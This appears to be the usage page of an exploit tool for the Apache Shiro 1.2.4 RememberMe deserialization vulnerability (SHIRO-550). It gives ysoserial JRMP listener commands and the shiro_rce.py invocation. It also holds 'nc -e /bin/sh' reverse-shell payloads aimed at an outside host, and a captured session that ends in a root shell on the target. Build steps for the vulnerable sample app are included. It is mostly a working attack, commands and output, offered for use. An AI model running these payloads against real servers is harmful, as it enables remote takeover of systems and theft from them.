Awesome
Shiro RememberMe 1.2.4 反序列化漏洞(SHIRO-550)
commons-collections-3.2.1.jar
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989'
nc -nlvp 8989
python usage:
python3 shiro_rce.py
_____ _ _ _____ _____ ____ _____ _____ ___
/ ____| | | |_ _| __ \ / __ \ | ____| ____|/ _ \
| (___ | |__| | | | | |__) | | | |______| |__ | |__ | | | |
\___ \| __ | | | | _ /| | | |______|___ \|___ \| | | |
____) | | | |_| |_| | \ \| |__| | ___) |___) | |_| |
|_____/|_| |_|_____|_| \_\____/ |____/|____/ \___/
Shiro RememberMe 1.2.4 反序列化漏洞
[+] Usage: python3 shiro_rce.py http://10.10.20.166:8080/shiro/ command
get for samples-web-1.2.4.war
git clone https://github.com/apache/shiro.git
cd shiro
git checkout shiro-root-1.2.4
mvn install
mvn version
mvn -v
Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-27T11:06:16-04:00)
Maven home: /opt/apache-maven-3.6.2
Java version: 1.8.0_60, vendor: Oracle Corporation, runtime: /opt/jdk1.8.0_60/jre
Default locale: en_US, platform encoding: UTF-8
OS name: "linux", version: "4.19.0-kali1-amd64", arch: "amd64", family: "unix"
cat ~/.m2/toolchains.xml
<?xml version="1.0" encoding="UTF8"?>
<toolchains>
<toolchain>
<type>jdk</type>
<provides>
<version>1.6</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>/opt/jdk/jdk1.6.0_45</jdkHome>
</configuration>
</toolchain>
</toolchains>
Reverse shell
python3 shiro_rce.py http://10.10.20.166:8080/samples-web-1.2.4/ "nc -e /bin/sh 192.168.5.86 9999"
_____ _ _ _____ _____ ____ _____ _____ ___
/ ____| | | |_ _| __ \ / __ \ | ____| ____|/ _ \
| (___ | |__| | | | | |__) | | | |______| |__ | |__ | | | |
\___ \| __ | | | | _ /| | | |______|___ \|___ \| | | |
____) | | | |_| |_| | \ \| |__| | ___) |___) | |_| |
|_____/|_| |_|_____|_| \_\____/ |____/|____/ \___/
Shiro RememberMe 1.2.4 反序列化漏洞
2019-10-25 13:43:33
[+] Send POC Success
[+] Exit Shiro RCE Vuln
C:\Users\CTF>nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.5.86] from (UNKNOWN) [10.10.20.166] 38656
id
uid=0(root) gid=0(root) groups=0(root)
cd /tmp
ls
123123123123
参考链接:
http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html
https://bling.kapsi.fi/blog/jvm-deserialization-broken-classldr.html